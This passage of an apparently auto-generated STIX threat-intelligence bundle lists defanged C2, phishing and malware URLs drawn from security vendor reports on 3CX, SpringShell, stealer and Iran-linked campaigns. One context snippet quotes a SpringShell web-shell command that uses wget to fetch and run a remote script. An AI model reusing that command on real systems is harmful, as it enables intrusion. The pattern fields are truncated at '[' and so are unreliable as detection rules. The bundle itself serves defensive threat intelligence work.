42","url":"https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04c14e23-ddbe-433e-8f63-2b9b8fdc97f2","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://akamaitechcloudservices[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: d4c310c262a88896c57bbe3b6456bd090 icon10.ico and icon11.ico hxxps://akamaitechcloudservices[.]com/v2/storage d51a790d187439ce030cf763237e992e9196e9aa417","pattern":"[url:value = 'https://akamaitechcloudservices[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d7bfa3e2-f5cb-4184-92b4-cb432f2fd1d8","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://azuredeploystore[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 74e059cf1720d77c47b97d97c3b0cf43ade5d96bf724639bd icon4.ico hxxps://azuredeploystore[.]com/cloud/services c13d49ed325dec9551906bafb6de9ec947e5ff9","pattern":"[url:value = 'https://azuredeploystore[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c62f50e-7a06-44c1-8f35-091ab1dc3de6","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://azureonlinestorage[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 030cf763237e992e9196e9aa41797a94956681b6279d1b9a icon12.ico hxxps://azureonlinestorage[.]com/azure/storage 4e08e4ffc699e0a1de4a5225a0b4920933fbb9cf","pattern":"[url:value = 'https://azureonlinestorage[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eafefcb4-d5c6-4560-bfa7-7ed73ecee336","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://glcloudservice[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: f1d0f17e0242efd78fd4ed0c344ac6469611ec72defa6b2d icon14.ico hxxps://glcloudservice[.]com/v1/console f47c883f59a4802514c57680de3f41f690871e26f25","pattern":"[url:value = 'https://glcloudservice[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--27bf82f5-431f-4ece-9ba4-c78a546bafbb","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://msedgepackageinfo[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: de4a5225a0b4920933fbb9cf123cde33e1674fde6d61444f icon13.ico hxxps://msedgepackageinfo[.]com/microsoft-edge 8c0b7d90f14c55d4f1d0f17e0242efd78fd4ed0","pattern":"[url:value = 'https://msedgepackageinfo[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--96a75cbb-e262-4942-aef0-958d5d6a4d82","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://msstorageazure[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: e0a2b07bf4771e897fb5a617998aa4876e0e1baa5fbb8e25c icon1.ico hxxps://msstorageazure[.]com/window d459aa0a63140ccc647e9026bfd1fccd4c310c262a88896","pattern":"[url:value = 'https://msstorageazure[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b9a57787-fa99-4c66-b285-dc0f7f77cb74","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://msstorageboxes[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 551906bafb6de9ec947e5ff936e7e40877feb2ba4bb176396 icon5.ico hxxps://msstorageboxes[.]com/office f1bf4078141d7ccb4f82e3f4f1c3571ee6dd79b5335eb0e","pattern":"[url:value = 'https://msstorageboxes[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de531465-db63-4db7-ac1c-d98c1b8dc2af","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://officeaddons[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: b4f82e3f4f1c3571ee6dd79b5335eb0e0464f877e6e6e3182 icon6.ico hxxps://officeaddons[.]com/technologies 2487b4e3c950d56fb15316245b3c51fbd70717838","pattern":"[url:value = 'https://officeaddons[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--541ac433-af36-4dab-a97d-05c65e68a25a","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://officestoragebox[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 68b769f333a48e228c32bcf26bd98e51310efd48e80c1789f icon2.ico hxxps://officestoragebox[.]com/api/session 268d4e399dbbb42ee1cd64d0da72c57214ac987efb","pattern":"[url:value = 'https://officestoragebox[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e6090434-5efe-4b66-8e53-59744ac12fff","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://pbxcloudeservices[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 0024533510ce22d71e05b20bad74d53fae158dc752a65782e icon9.ico hxxps://pbxcloudeservices[.]com/phonesystem Table 1. Icon files hosted at GitHub accou","pattern":"[url:value = 'https://pbxcloudeservices[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ec52bd5-11e7-4b25-b67b-25b3081b2106","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://pbxsources[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: 14c57680de3f41f690871e26f250c6e890651ba71027e4d3 icon15.ico hxxps://pbxsources[.]com/exchange 2c9957ea04d033d68b769f333a48e228c32bcf26bd98e","pattern":"[url:value = 'https://pbxsources[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--adc53415-9bf6-421e-87a7-008b672bbb47","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://raw.githubusercontent[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: name includes a randomly generated number between 1 and 15: hxxps://raw.githubusercontent[.]com/IconStorages/images/main/icon[1-15].ico This request l","pattern":"[url:value = 'https://raw.githubusercontent[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b02df860-2f5b-4c44-840f-965dac11fb63","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://sourceslabs[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: fb15316245b3c51fbd70717838f6f82f32db2efcc4d9da6de icon7.ico hxxps://sourceslabs[.]com/downloads e059c8c8b01d6f3af32257fc2b6fe188d5f4359c308b","pattern":"[url:value = 'https://sourceslabs[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d029971-5b0c-4290-a469-99d36509b3dc","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://visualstudiofactory[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: ee1cd64d0da72c57214ac987efbb509c46cc57ea6b214beca icon3.ico hxxps://visualstudiofactory[.]com/workload c62dce8a77d777774e059cf1720d77c47b97d97c3b0cf","pattern":"[url:value = 'https://visualstudiofactory[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4270688e-a068-473e-927f-b6109935ff74","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://zacharryblogs[","description":"Seen in \"Threat Brief: 3CXDesktopApp Supply Chain Attack (Updated)\" (Palo Alto Unit 42). Context: af32257fc2b6fe188d5f4359c308b3684b1e0db2071c3425c icon8.ico hxxps://zacharryblogs[.]com/feed d0f1984b4fe896d0024533510ce22d71e05b20bad74d53fae","pattern":"[url:value = 'https://zacharryblogs[']","pattern_type":"stix","valid_from":"2026-08-17T12:18:51.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/3cxdesktopapp-supply-chain-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc00ce51-aec2-429f-bfb1-48dc78033c13","created":"2026-08-17T10:58:47.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://107.174.133[","description":"Seen in \"CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell) (Updated)\" (Palo Alto Unit 42). Context: atwar.jsp?pwd=j&cmd=/bin/sh/-c${IFS}'cd${IFS}/tmp;wget${IFS}hxxp://107.174.133[.]167/t.sh${IFS}-O-%a6sh${IFS}SpringCore;' Upon further anal","pattern":"[url:value = 'http://107.174.133[']","pattern_type":"stix","valid_from":"2026-08-17T10:58:47.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3e03d5b-d187-4367-badb-33e26fc927fb","created":"2026-08-17T10:57:32.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://checkblacklistwords[","description":"Seen in \"Fake CVE-2023\" (Palo Alto Unit 42). Context: e PoC code to GitHub. However, the HTTP response to the URL hxxp://checkblacklistwords[.]eu/ has a Last-Modified field that is set to Sun, 16 Jul 2","pattern":"[url:value = 'http://checkblacklistwords[']","pattern_type":"stix","valid_from":"2026-08-17T10:57:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fab1fbad-193e-4e08-8e7d-dd20cb11120b","created":"2026-07-22T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://154[","description":"Seen in \"PurpleBravo’s Targeting of the IT Software Supply Chain\" (Recorded Future). Context: n IDs targeted by the Chrome “auto” modes. UPLOAD0623URL = \"hxxp://154[.]58[.]204[.]15:8080\" # Change to your server MAX0623SLEEP =","pattern":"[url:value = 'http://154[']","pattern_type":"stix","valid_from":"2026-07-22T00:00:00.000Z","labels":["auto-extracted","vulnerability"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e209bd21-7c0c-4c11-b950-0cd8aca2f4dd","created":"2026-07-14T07:42:53.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://endpoint-api-v1[","description":"Seen in \"CrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper\" (Security Affairs). Context: t downloads the payload disk image over cleartext HTTP from hxxp://endpoint-api-v1[.]com/d/f1b24e/download , retrying up to three times, and sa","pattern":"[url:value = 'http://endpoint-api-v1[']","pattern_type":"stix","valid_from":"2026-07-14T07:42:53.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/195278/malware/crashstealer-new-macos-infostealer-uses-signed-apps-to-evade-gatekeeper.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34711ee4-352e-4306-bfa5-0ba24a2ea7fb","created":"2026-07-09T08:29:43.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://iplogger[","description":"Seen in \"Fake VPN and 7-Zip Apps Turn Victims Into Residential Proxy Nodes\" (Security Affairs). Context: r, a legitimate visitor-tracking service. The specific URL, hxxps://iplogger[.]com/mnWD, appeared across multiple distinct payloads spann","pattern":"[url:value = 'https://iplogger[']","pattern_type":"stix","valid_from":"2026-07-09T08:29:43.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194990/malware/fake-vpn-and-7-zip-apps-turn-victims-into-residential-proxy-nodes.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c5d432b-6bc9-4f62-8b3b-25d5732c83fb","created":"2026-07-02T09:13:13.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: http://45.131.66[","description":"Seen in \"AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack\" (The Hacker News). Context: ion) Command-and-control: 45.131.66[.]106, with a beacon to hxxp://45.131.66[.]106:4444/beacon every 30 minutes Claimed staging server: 6","pattern":"[url:value = 'http://45.131.66[']","pattern_type":"stix","valid_from":"2026-07-02T09:13:13.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/ai-agent-exploits-langflow-rce-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f99b918-f888-43bc-a559-02e671220431","created":"2026-06-23T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://continuetogo[","description":"Seen in \"Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank\" (Recorded Future). Context: itten, TA453, and APT42 (along with its forerunner UNC788). hxxps[:]//continuetogo[.]me/Sec=Tab=settings/id=xxxxx=xxxxx/continue-to-settings.","pattern":"[url:value = 'https://continuetogo[']","pattern_type":"stix","valid_from":"2026-06-23T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/suspected-iran-nexus-tag-56-uses-uae-forum-lure-for-credential-theft-against-us-think-tank"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2e5d22e-90b6-45c9-bdf0-feb012283ec2","created":"2026-06-23T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://mailer-daemon[","description":"Seen in \"Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank\" (Recorded Future). Context: me/Sec=Tab=settings/id=xxxxx=xxxxx/continue-to-settings.php hxxps[:]//mailer-daemon[.]net/file=sharing=system/file.id.X=xxxxxx/continue-to-set","pattern":"[url:value = 'https://mailer-daemon[']","pattern_type":"stix","valid_from":"2026-06-23T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/suspected-iran-nexus-tag-56-uses-uae-forum-lure-for-credential-theft-against-us-think-tank"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a4647d9-89d3-45da-b1c0-b134649fde1f","created":"2026-06-23T00:00:00.000Z","modified":"2026-09-16T07:00:23.356Z","created_by_ref":"identity--54d551e9-d4cf-40a8-bc11-1a5f0865225e","name":"url: https://tinyurl[","description":"Seen in \"Suspected Iran-Nexus TAG-56 Uses UAE Forum Lure for Credential Theft Against US Think Tank\" (Recorded Future). Context: a412201039105d86 2d5f2bf12085d41cb18a933 98afef0be8dfb9c229 hxxps[:]//tinyurl[.]ink/8tio97cy/Iran%20nuke.docx 28 February 2022 Table 2:","pattern":"[url:value = 'https://tinyurl[']","pattern_type":"stix","valid_from":"2026-06-23T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/suspected-iran-nexus-tag-56-uses-uae-forum-lure-for-credential-theft-against-us-think-tank"}]}]}